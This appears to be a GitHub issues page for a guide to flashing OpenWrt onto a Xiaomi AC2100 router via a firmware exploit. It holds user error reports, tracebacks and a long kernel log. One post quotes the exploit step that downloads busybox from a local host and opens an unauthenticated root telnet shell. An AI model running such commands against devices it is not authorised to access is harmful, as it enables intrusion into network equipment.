ecklf / ac2100-openwrt-guide Goto Github PK

Need to install:
sudo apt install python3 netcat
sudo apt install scapy
sudo apt install tcpdump
sudo apt install telnet
pip3 install scapy

All run OK but in: 7 Running the exploit
https://github.com/impulse/ac2100-openwrt-guide#7-running-the-exploit

"When the packet has been sent successfully, you should be able to see a connection from 192.168.31.1:63627 in your netcat session."

my netcat session no connection from: 192.168.31.1:63627

Hi,

When I run the script pppoe-simulator.py, i have got an error as it show below. i enter the correct MAC (from the bottom of the router). Is anyone else handle this issue? any assist will we welcome. thanks.

sudo python3 pppoe-simulator.py
WARNING: No route found for IPv6 destination :: (no default route?). This affects only IPv6
Traceback (most recent call last):
File "pppoe-simulator.py", line 181, in
mac_server = get_if_hwaddr(interface)
File "/usr/lib/python3/dist-packages/scapy/arch/init.py", line 55, in get_if_hwaddr
mac = get_if_raw_hwaddr(iff)
File "/usr/lib/python3/dist-packages/scapy/arch/linux.py", line 84, in get_if_raw_hwaddr
return struct.unpack("16xh6s8x",get_if(iff,SIOCGIFHWADDR))[1]
File "/usr/lib/python3/dist-packages/scapy/arch/linux.py", line 288, in get_if
ifreq = ioctl(s, cmd, struct.pack("16s16x",bytes(iff,'utf-8')))
OSError: [Errno 19] No such device

Thank you very much for the work ...
I followed the manual and managed to install openwrt on my Mi AC2100 router, but ...
Why is the 5GHZ network not working? There's a solution? Any version that fixes it?

Hello.

My system is MX Linux 19.3 of 32 bits.

Python 3 data:

Python 3.7.3
python3-scapy (2.4.0-2).

I found the next error:

# python3 PPPoE-Simulator.py 
Waiting for packets
Traceback (most recent call last):
  File "PPPoE-Simulator.py", line 183, in <module>
    sniff(prn=packet_callback, filter="pppoed or pppoes", lfilter=isNotOutgoing)
  File "/usr/lib/python3/dist-packages/scapy/sendrecv.py", line 780, in sniff
    r = prn(p)
  File "PPPoE-Simulator.py", line 63, in packet_callback
    for tag in pkt[PPPoED][PPPoED_Tags].tag_list:
NameError: name 'PPPoED_Tags' is not defined

I need help for resolve it, didn't found a solution searching in internet.
Thanks.

Hi, Did someone handled that issue? thanks

root@nati-VirtualBox:/home/nati/ac2100-openwrt-guide-master# sudo python3 pppoe-simulator.py
WARNING: No route found for IPv6 destination :: (no default route?). This affects only IPv6
Waiting for packets
Traceback (most recent call last):
File "pppoe-simulator.py", line 183, in
sniff(prn=packet_callback, filter="pppoed or pppoes", lfilter=isNotOutgoing)
File "/usr/lib/python3/dist-packages/scapy/sendrecv.py", line 603, in sniff
r = prn(p)
File "pppoe-simulator.py", line 63, in packet_callback
for tag in pkt[PPPoED][PPPoED_Tags].tag_list:
NameError: name 'PPPoED_Tags' is not defined

Looking at your guide, I decided to buy this router model for my home.

Followed steps 1 to 6, but I got stuck on Step 7

If you do the following commands quickly, there should be no issues:

cd /tmp
wget http://192.168.31.177/busybox
chmod a+x ./busybox
./busybox telnetd -l /bin/sh

for me the result is:

# ./busybox telnetd -l /bin/sh
zsh: exec format error: ./busybox

I also tried to execut using /bin/sh

sh: ./busybox: cannot execute binary file

I don't know which MacOS version you used to make this guide, but for me this bundled version of Busybox is not working.

Notes:

• I tried to compile a version from https://github.com/daliworks/busybox-osx, but no success when I try to run the telnetd command.
• I tried to use telned from brew, but the command arguments are slightly different.

Hello, there is my outputs, also seeking some packets in wireshark, but no specific packets to port 31337 received.
What is the additional conditions to exploit working? maybe Xiaomi fixed it in recent ships?

Hello,

After flashing openwrt evrything is working pretty well but I noticed that eth0 is always down/up in kernel log. Full log :

[ 0.000000] Linux version 4.14.180 (builder@buildhost) (gcc version 7.5.0 (OpenWrt GCC 7.5.0 r11063-85e04e9f46)) #0 SMP Sat May 16 18:32:20 2020
[ 0.000000] SoC Type: MediaTek MT7621 ver:1 eco:3
[ 0.000000] bootconsole [early0] enabled
[ 0.000000] CPU0 revision is: 0001992f (MIPS 1004Kc)
[ 0.000000] MIPS: machine is Xiaomi Mi Router AC2100
[ 0.000000] Determined physical RAM map:
[ 0.000000] memory: 08000000 @ 00000000 (usable)
[ 0.000000] Initrd not found or empty - disabling initrd
[ 0.000000] VPE topology {2,2} total 4
[ 0.000000] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.000000] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.000000] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.000000] Zone ranges:
[ 0.000000] Normal [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] HighMem empty
[ 0.000000] Movable zone start for each node
[ 0.000000] Early memory node ranges
[ 0.000000] node 0: [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] Initmem setup node 0 [mem 0x0000000000000000-0x0000000007ffffff]
[ 0.000000] On node 0 totalpages: 32768
[ 0.000000] free_area_init_node: node 0, pgdat 805727a0, node_mem_map 81003000
[ 0.000000] Normal zone: 256 pages used for memmap
[ 0.000000] Normal zone: 0 pages reserved
[ 0.000000] Normal zone: 32768 pages, LIFO batch:7
[ 0.000000] random: get_random_bytes called from 0x80575744 with crng_init=0
[ 0.000000] percpu: Embedded 14 pages/cpu s26224 r8192 d22928 u57344
[ 0.000000] pcpu-alloc: s26224 r8192 d22928 u57344 alloc=144096
[ 0.000000] pcpu-alloc: [0] 0 [0] 1 [0] 2 [0] 3
[ 0.000000] Built 1 zonelists, mobility grouping on. Total pages: 32512
[ 0.000000] Kernel command line: console=ttyS0,115200n8 rootfstype=squashfs,jffs2
[ 0.000000] PID hash table entries: 512 (order: -1, 2048 bytes)
[ 0.000000] Dentry cache hash table entries: 16384 (order: 4, 65536 bytes)
[ 0.000000] Inode-cache hash table entries: 8192 (order: 3, 32768 bytes)
[ 0.000000] Writing ErrCtl register=000033cc
[ 0.000000] Readback ErrCtl register=000033cc
[ 0.000000] Memory: 122512K/131072K available (4748K kernel code, 239K rwdata, 588K rodata, 1260K init, 255K bss, 8560K reserved, 0K cma-reserved, 0K highmem)
[ 0.000000] SLUB: HWalign=32, Order=0-3, MinObjects=0, CPUs=4, Nodes=1
[ 0.000000] Hierarchical RCU implementation.
[ 0.000000] NR_IRQS: 256
[ 0.000000] CPU Clock: 880MHz
[ 0.000000] clocksource: GIC: mask: 0xffffffffffffffff max_cycles: 0xcaf478abb4, max_idle_ns: 440795247997 ns
[ 0.000000] clocksource: MIPS: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 4343773742 ns
[ 0.000009] sched_clock: 32 bits at 440MHz, resolution 2ns, wraps every 4880645118ns
[ 0.007801] Calibrating delay loop... 586.13 BogoMIPS (lpj=2930688)
[ 0.073968] pid_max: default: 32768 minimum: 301
[ 0.078726] Mount-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.085234] Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes)
[ 0.093924] Hierarchical SRCU implementation.
[ 0.099003] smp: Bringing up secondary CPUs ...
[ 0.120885] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.120893] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.120904] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.121030] CPU1 revision is: 0001992f (MIPS 1004Kc)
[ 0.163708] Synchronize counters for CPU 1: done.
[ 0.214178] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.214186] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.214194] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.214260] CPU2 revision is: 0001992f (MIPS 1004Kc)
[ 0.254566] Synchronize counters for CPU 2: done.
[ 0.301718] Primary instruction cache 32kB, VIPT, 4-way, linesize 32 bytes.
[ 0.301725] Primary data cache 32kB, 4-way, PIPT, no aliases, linesize 32 bytes
[ 0.301731] MIPS secondary cache 256kB, 8-way, linesize 32 bytes.
[ 0.301804] CPU3 revision is: 0001992f (MIPS 1004Kc)
[ 0.339747] Synchronize counters for CPU 3: done.
[ 0.369595] smp: Brought up 1 node, 4 CPUs
[ 0.377255] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns
[ 0.387042] futex hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.393329] pinctrl core: initialized pinctrl subsystem
[ 0.399829] NET: Registered protocol family 16
[ 0.409954] FPU Affinity set after 11720 emulations
[ 0.410650] pull PCIe RST: RALINK_RSTCTRL = 4000000
[ 0.715899] release PCIe RST: RALINK_RSTCTRL = 7000000
[ 0.720947] ***** Xtal 40MHz *****
[ 0.724303] release PCIe RST: RALINK_RSTCTRL = 7000000
[ 0.729401] Port 0 N_FTS = 1b102800
[ 0.732867] Port 1 N_FTS = 1b102800
[ 0.736310] Port 2 N_FTS = 1b102800
[ 1.891591] PCIE2 no card, disable it(RST&CLK)
[ 1.895949] -> 21007f2
[ 1.898353] PCIE0 enabled
[ 1.900946] PCIE1 enabled
[ 1.903549] PCI host bridge /pcie@1e140000 ranges:
[ 1.908323] MEM 0x0000000060000000..0x000000006fffffff
[ 1.913482] IO 0x000000001e160000..0x000000001e16ffff
[ 1.918676] PCI coherence region base: 0xbfbf8000, mask/settings: 0x60000000
[ 1.934507] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 1.940271] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 1.946026] mt7621_gpio 1e000600.gpio: registering 32 gpios
[ 1.953038] PCI host bridge to bus 0000:00
[ 1.957116] pci_bus 0000:00: root bus resource [mem 0x60000000-0x6fffffff]
[ 1.963885] pci_bus 0000:00: root bus resource [io 0xffffffff]
[ 1.969776] pci_bus 0000:00: root bus resource [??? 0x00000000 flags 0x0]
[ 1.976498] pci_bus 0000:00: No busn resource found for root bus, will use [bus 00-ff]
[ 1.984419] pci 0000:00:00.0: [0e8d:0801] type 01 class 0x060400
[ 1.984456] pci 0000:00:00.0: reg 0x10: [mem 0x00000000-0x7fffffff]
[ 1.984467] pci 0000:00:00.0: reg 0x14: [mem 0x00000000-0x0000ffff]
[ 1.984530] pci 0000:00:00.0: supports D1
[ 1.984538] pci 0000:00:00.0: PME# supported from D0 D1 D3hot
[ 1.984772] pci 0000:00:01.0: [0e8d:0801] type 01 class 0x060400
[ 1.984810] pci 0000:00:01.0: reg 0x10: [mem 0x00000000-0x7fffffff]
[ 1.984828] pci 0000:00:01.0: reg 0x14: [mem 0x00000000-0x0000ffff]
[ 1.984887] pci 0000:00:01.0: supports D1
[ 1.984895] pci 0000:00:01.0: PME# supported from D0 D1 D3hot
[ 1.985145] pci 0000:00:00.0: bridge configuration invalid ([bus 00-00]), reconfiguring
[ 1.993051] pci 0000:00:01.0: bridge configuration invalid ([bus 00-00]), reconfiguring
[ 2.001224] pci 0000:01:00.0: [14c3:7615] type 00 class 0x000280
[ 2.001284] pci 0000:01:00.0: reg 0x10: [mem 0x00000000-0x000fffff 64bit]
[ 2.001601] pci_bus 0000:01: busn_res: [bus 01-ff] end is updated to 01
[ 2.001822] pci 0000:02:00.0: [14c3:7603] type 00 class 0x028000
[ 2.001875] pci 0000:02:00.0: reg 0x10: [mem 0x00000000-0x000fffff]
[ 2.002005] pci 0000:02:00.0: PME# supported from D0 D3hot D3cold
[ 2.002200] pci_bus 0000:02: busn_res: [bus 02-ff] end is updated to 02
[ 2.002228] pci_bus 0000:00: busn_res: [bus 00-ff] end is updated to 02
[ 2.002310] pci 0000:00:00.0: BAR 0: no space for [mem size 0x80000000]
[ 2.008818] pci 0000:00:00.0: BAR 0: failed to assign [mem size 0x80000000]
[ 2.015805] pci 0000:00:01.0: BAR 0: no space for [mem size 0x80000000]
[ 2.022314] pci 0000:00:01.0: BAR 0: failed to assign [mem size 0x80000000]
[ 2.029249] pci 0000:00:00.0: BAR 8: assigned [mem 0x60000000-0x600fffff]
[ 2.035966] pci 0000:00:01.0: BAR 8: assigned [mem 0x60100000-0x601fffff]
[ 2.042722] pci 0000:00:00.0: BAR 1: assigned [mem 0x60200000-0x6020ffff]
[ 2.049445] pci 0000:00:01.0: BAR 1: assigned [mem 0x60210000-0x6021ffff]
[ 2.056209] pci 0000:01:00.0: BAR 0: assigned [mem 0x60000000-0x600fffff 64bit]
[ 2.063453] pci 0000:00:00.0: PCI bridge to [bus 01]
[ 2.068390] pci 0000:00:00.0: bridge window [mem 0x60000000-0x600fffff]
[ 2.075113] pci 0000:02:00.0: BAR 0: assigned [mem 0x60100000-0x601fffff]
[ 2.081861] pci 0000:00:01.0: PCI bridge to [bus 02]
[ 2.086765] pci 0000:00:01.0: bridge window [mem 0x60100000-0x601fffff]
[ 2.094860] clocksource: Switched to clocksource GIC
[ 2.101383] NET: Registered protocol family 2
[ 2.106455] TCP established hash table entries: 1024 (order: 0, 4096 bytes)
[ 2.113327] TCP bind hash table entries: 1024 (order: 1, 8192 bytes)
[ 2.119669] TCP: Hash tables configured (established 1024 bind 1024)
[ 2.126099] UDP hash table entries: 256 (order: 1, 8192 bytes)
[ 2.131861] UDP-Lite hash table entries: 256 (order: 1, 8192 bytes)
[ 2.138311] NET: Registered protocol family 1
[ 2.142628] PCI: CLS 0 bytes, default 32
[ 2.374804] 4 CPUs re-calibrate udelay(lpj = 2924544)
[ 2.381053] Crashlog allocated RAM at address 0x3f00000
[ 2.386434] workingset: timestamp_bits=30 max_order=15 bucket_order=0
[ 2.395300] random: fast init done
[ 2.401955] squashfs: version 4.0 (2009/01/31) Phillip Lougher
[ 2.407754] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc.
[ 2.420582] io scheduler noop registered
[ 2.424420] io scheduler deadline registered (default)
[ 2.430621] Serial: 8250/16550 driver, 16 ports, IRQ sharing enabled
[ 2.439762] console [ttyS0] disabled
[ 2.443302] 1e000c00.uartlite: ttyS0 at MMIO 0x1e000c00 (irq = 19, base_baud = 3125000) is a 16550A
[ 2.452354] console [ttyS0] enabled
[ 2.459233] bootconsole [early0] disabled
[ 2.469389] MediaTek Nand driver init, version v2.1 Fix AHB virt2phys error
[ 2.476531] Enable NFI Clock
[ 2.479402] # MTK NAND # : Use HW ECC
[ 2.483061] Device found in MTK table, ID: c8d1, EXT_ID: 809540
[ 2.488972] Support this Device in MTK table! c8d1
[ 2.493918] [NAND]select ecc bit:4, sparesize :64 spare_per_sector=16
[ 2.500404] nand: device found, Manufacturer ID: 0xc8, Chip ID: 0xd1
[ 2.506747] nand: ESMT NAND 128MiB 3,3V 8-bit
[ 2.511084] nand: 128 MiB, SLC, erase size: 128 KiB, page size: 2048, OOB size: 64
[ 2.518653] Scanning device for bad blocks
[ 2.664712] 10 fixed-partitions partitions found on MTD device MT7621-NAND
[ 2.671571] Creating 10 MTD partitions on "MT7621-NAND":
[ 2.676894] 0x000000000000-0x000000080000 : "Bootloader"
[ 2.683087] 0x000000080000-0x0000000c0000 : "Config"
[ 2.688875] 0x0000000c0000-0x000000100000 : "Bdata"
[ 2.694561] 0x000000100000-0x000000140000 : "Factory"
[ 2.700444] 0x000000140000-0x000000180000 : "crash"
[ 2.706213] 0x000000180000-0x0000001c0000 : "crash_syslog"
[ 2.712473] 0x0000001c0000-0x000000200000 : "reserved0"
[ 2.718587] 0x000000200000-0x000000600000 : "kernel_stock"
[ 2.724966] 0x000000600000-0x000000a00000 : "kernel"
[ 2.730772] 0x000000a00000-0x000007f80000 : "ubi"
[ 2.737239] [mtk_nand] probe successfully!
[ 2.742041] Signature matched and data read!
[ 2.746324] load_fact_bbt success 1023
[ 2.750610] libphy: Fixed MDIO Bus: probed
[ 2.827381] libphy: mdio: probed
[ 4.230979] mtk_soc_eth 1e100000.ethernet: loaded mt7530 driver
[ 4.237632] mtk_soc_eth 1e100000.ethernet eth0: mediatek frame engine at 0xbe100000, irq 21
[ 4.248389] NET: Registered protocol family 10
[ 4.254335] Segment Routing with IPv6
[ 4.258154] NET: Registered protocol family 17
[ 4.262646] bridge: filtering via arp/ip/ip6tables is no longer available by default. Update your scripts to load br_netfilter if you need this.
[ 4.275561] 8021q: 802.1Q VLAN Support v1.8
[ 4.282612] UBI: auto-attach mtd9
[ 4.285996] ubi0: attaching mtd9
[ 4.564941] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[ 5.371896] ubi0: scanning is finished
[ 5.391462] ubi0: attached mtd9 (name "ubi", size 117 MiB)
[ 5.396964] ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
[ 5.403804] ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048
[ 5.410572] ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096
[ 5.417514] ubi0: good PEBs: 940, bad PEBs: 0, corrupted PEBs: 0
[ 5.423489] ubi0: user volume: 2, internal volumes: 1, max. volumes count: 128
[ 5.430692] ubi0: max/mean erase counter: 2/0, WL threshold: 4096, image sequence number: 1519070550
[ 5.439794] ubi0: available PEBs: 0, total reserved PEBs: 940, PEBs reserved for bad PEB handling: 20
[ 5.449004] ubi0: background thread "ubi_bgt0d" started, PID 392
[ 5.450704] block ubiblock0_0: created from ubi0:0(rootfs)
[ 5.460469] ubiblock: device ubiblock0_0 (rootfs) set to be root filesystem
[ 5.467419] hctosys: unable to open rtc device (rtc0)
[ 5.479308] VFS: Mounted root (squashfs filesystem) readonly on device 254:0.
[ 5.490860] Freeing unused kernel memory: 1260K
[ 5.495410] This architecture does not have kernel memory protection.
[ 6.035228] init: Console is alive
[ 6.038872] init: - watchdog -
[ 6.163474] mtk_soc_eth 1e100000.ethernet eth0: port 3 link up
[ 6.531212] mtk_soc_eth 1e100000.ethernet eth0: port 0 link up
[ 6.572052] kmodloader: loading kernel modules from /etc/modules-boot.d/
[ 6.603177] kmodloader: done loading kernel modules from /etc/modules-boot.d/*
[ 6.615156] init: - preinit -
[ 7.453107] mtk_soc_eth 1e100000.ethernet: PPE started
[ 7.522518] random: procd: uninitialized urandom read (4 bytes read)
[ 10.669192] UBIFS (ubi0:1): background thread "ubifs_bgt0_1" started, PID 473
[ 10.742196] UBIFS (ubi0:1): recovery needed
[ 10.923422] UBIFS (ubi0:1): recovery completed
[ 10.928023] UBIFS (ubi0:1): UBIFS: mounted UBI device 0, volume 1, name "rootfs_data"
[ 10.935837] UBIFS (ubi0:1): LEB size: 126976 bytes (124 KiB), min./max. I/O unit sizes: 2048 bytes/2048 bytes
[ 10.945725] UBIFS (ubi0:1): FS size: 110469120 bytes (105 MiB, 870 LEBs), journal size 5586944 bytes (5 MiB, 44 LEBs)
[ 10.956300] UBIFS (ubi0:1): reserved for root: 4952683 bytes (4836 KiB)
[ 10.962887] UBIFS (ubi0:1): media format: w4/r0 (latest is w5/r0), UUID 9EFAE145-89EF-4EE9-A977-096FA848E7B0, small LPT model
[ 10.981859] mount_root: switching to ubifs overlay
[ 11.010268] urandom-seed: Seeding with /etc/urandom.seed
[ 11.113562] mtk_soc_eth 1e100000.ethernet: 0x100 = 0x6060000c, 0x10c = 0x80818
[ 11.131350] procd: - early -
[ 11.134323] procd: - watchdog -
[ 11.794966] procd: - watchdog -
[ 11.798444] procd: - ubus -
[ 11.866056] random: ubusd: uninitialized urandom read (4 bytes read)
[ 11.875898] random: ubusd: uninitialized urandom read (4 bytes read)
[ 11.882632] random: ubusd: uninitialized urandom read (4 bytes read)
[ 11.889867] procd: - init -
[ 12.616896] kmodloader: loading kernel modules from /etc/modules.d/*
[ 12.645018] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 12.655591] Mirror/redirect action on
[ 12.667798] u32 classifier
[ 12.670515] input device check on
[ 12.674157] Actions configured
[ 12.692792] nf_conntrack version 0.5.0 (2048 buckets, 8192 max)
[ 12.711580] Loading modules backported from Linux version v4.19.120-0-gfdc072324f3c
[ 12.719360] Backport generated by backports.git v4.19.120-1-0-g60c3a249
[ 12.727899] urngd: v1.0.2 started.
[ 12.729013] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 12.792947] xt_time: kernel timezone is -0000
[ 12.857155] bus=0x2, slot = 0x1, irq=0xff
[ 12.861197] PCI: Enabling device 0000:00:01.0 (0004 -> 0006)
[ 12.867100] mt7603e 0000:02:00.0: ASIC revision: 76030010
[ 12.918907] random: crng init done
[ 12.922339] random: 6 urandom warning(s) missed due to ratelimiting
[ 13.896095] mt7603e 0000:02:00.0: Firmware Version: ap_pcie
[ 13.901665] mt7603e 0000:02:00.0: Build Time: 20160107100755
[ 13.944853] mt7603e 0000:02:00.0: firmware init done
[ 14.120105] ieee80211 phy0: Selected rate control algorithm 'minstrel_ht'
[ 14.125490] bus=0x1, slot = 0x0, irq=0x0
[ 14.129450] PCI: Enabling device 0000:00:00.0 (0004 -> 0006)
[ 14.250612] mt7615e 0000:01:00.0: HW/SW Version: 0x8a108a10, Build Time: 20180518100604a
[ 14.250612]
[ 14.485745] mt7615e 0000:01:00.0: N9 Firmware Version: reserved, Build Time: 20190103180756
[ 14.503150] mt7615e 0000:01:00.0: CR4 Firmware Version: reserved, Build Time: 20181207140436
[ 22.153512] ieee80211 phy1: Selected rate control algorithm 'minstrel_ht'
[ 22.162119] PPP generic driver version 2.4.2
[ 22.167889] NET: Registered protocol family 24
[ 22.175082] kmodloader: done loading kernel modules from /etc/modules.d/*
[ 24.460564] xt_CT: No such helper "ftp"
[ 28.632176] mtk_soc_eth 1e100000.ethernet: PPE started
[ 28.643286] device eth0 entered promiscuous mode
[ 28.649363] br-lan: port 1(eth0.1) entered blocking state
[ 28.654801] br-lan: port 1(eth0.1) entered disabled state
[ 28.661032] device eth0.1 entered promiscuous mode
[ 28.670968] br-lan: port 1(eth0.1) entered blocking state
[ 28.676456] br-lan: port 1(eth0.1) entered forwarding state
[ 28.682512] IPv6: ADDRCONF(NETDEV_UP): br-lan: link is not ready
[ 29.585534] xt_CT: No such helper "ftp"
[ 29.757889] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready
[ 31.652678] IPv6: ADDRCONF(NETDEV_UP): wlan1: link is not ready
[ 31.670906] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[ 31.678678] br-lan: port 2(wlan1) entered blocking state
[ 31.684032] br-lan: port 2(wlan1) entered disabled state
[ 31.690102] device wlan1 entered promiscuous mode
[ 31.695425] br-lan: port 3(wlan0) entered blocking state
[ 31.700754] br-lan: port 3(wlan0) entered disabled state
[ 31.706708] device wlan0 entered promiscuous mode
[ 31.711784] br-lan: port 3(wlan0) entered blocking state
[ 31.717166] br-lan: port 3(wlan0) entered forwarding state
[ 31.752608] xt_CT: No such helper "ftp"
[ 31.806130] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[ 34.007907] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready
[ 34.014697] br-lan: port 2(wlan1) entered blocking state
[ 34.020120] br-lan: port 2(wlan1) entered forwarding state
[ 34.430911] xt_CT: No such helper "ftp"
[55487.503257] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[55490.203043] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[55524.017638] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[55526.918926] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[56930.054821] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[56931.636429] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[76373.892246] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[76376.637610] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[76427.706076] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[76430.595336] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[81030.704772] xt_CT: No such helper "ftp"
[81373.398790] vlan egress tag control neither untag nor tag.
[81373.404273] vlan egress tag control neither untag nor tag.
[81373.409807] vlan egress tag control neither untag nor tag.
[81373.728699] vlan egress tag control neither untag nor tag.
[81373.734182] vlan egress tag control neither untag nor tag.
[81373.739695] vlan egress tag control neither untag nor tag.
[81664.952757] xt_CT: No such helper "ftp"
[81737.198723] xt_CT: No such helper "ftp"
[81970.473315] xt_CT: No such helper "ftp"
[82401.267756] device wlan0 left promiscuous mode
[82401.272452] br-lan: port 3(wlan0) entered disabled state
[82401.346631] device wlan1 left promiscuous mode
[82401.351453] br-lan: port 2(wlan1) entered disabled state
[82403.087313] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[82403.098497] br-lan: port 2(wlan0) entered blocking state
[82403.103844] br-lan: port 2(wlan0) entered disabled state
[82403.110151] device wlan0 entered promiscuous mode
[82403.115315] br-lan: port 2(wlan0) entered blocking state
[82403.120666] br-lan: port 2(wlan0) entered forwarding state
[82403.353994] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[82403.412852] IPv6: ADDRCONF(NETDEV_UP): wlan1: link is not ready
[82403.424922] br-lan: port 3(wlan1) entered blocking state
[82403.430270] br-lan: port 3(wlan1) entered disabled state
[82403.436426] device wlan1 entered promiscuous mode
[82403.441677] br-lan: port 3(wlan1) entered blocking state
[82403.447123] br-lan: port 3(wlan1) entered forwarding state
[82403.605045] br-lan: port 3(wlan1) entered disabled state
[82405.869164] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready
[82405.875925] br-lan: port 3(wlan1) entered blocking state
[82405.881301] br-lan: port 3(wlan1) entered forwarding state
[82680.491286] device wlan0 left promiscuous mode
[82680.495964] br-lan: port 2(wlan0) entered disabled state
[82681.227452] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready
[82681.239801] br-lan: port 2(wlan0) entered blocking state
[82681.245158] br-lan: port 2(wlan0) entered disabled state
[82681.251521] device wlan0 entered promiscuous mode
[82681.256611] br-lan: port 2(wlan0) entered blocking state
[82681.262028] br-lan: port 2(wlan0) entered forwarding state
[82681.469829] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready
[82705.550916] device wlan1 left promiscuous mode
[82705.555578] br-lan: port 3(wlan1) entered disabled state
[82707.162616] IPv6: ADDRCONF(NETDEV_UP): wlan1: link is not ready
[82707.172918] br-lan: port 3(wlan1) entered blocking state
[82707.178230] br-lan: port 3(wlan1) entered disabled state
[82707.184233] device wlan1 entered promiscuous mode
[82707.189469] br-lan: port 3(wlan1) entered blocking state
[82707.194863] br-lan: port 3(wlan1) entered forwarding state
[82708.531985] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready
[86987.212922] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[86988.919269] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[91705.337708] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[134880.786530] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[150040.584414] conntrack: generic helper won't handle protocol 47. Please consider loading the specific helper module.
[163954.358428] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[163957.738861] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[164012.697589] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[164015.482658] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[172735.519074] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[172737.162444] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[250536.642839] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[250539.350239] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[250589.100504] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[250591.974328] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[260039.941929] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[260041.634657] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[260206.302761] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[260209.026811] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[260239.240067] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[260242.144461] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[260531.961096] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[260533.669832] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[260804.207817] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[260806.924404] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[260833.730665] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[260836.627875] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[261315.760518] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[261317.465889] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[263012.869028] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[263015.594313] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[263058.051157] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[263060.880840] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[263540.885965] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[263542.831059] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[272225.776905] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[334995.564885] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[338639.626662] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[338642.855298] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[338696.615310] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[338699.582353] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[345185.393519] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[345187.038789] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
[357501.678030] mtk_soc_eth 1e100000.ethernet eth0: port 2 link down
[424149.286860] mtk_soc_eth 1e100000.ethernet eth0: port 2 link up
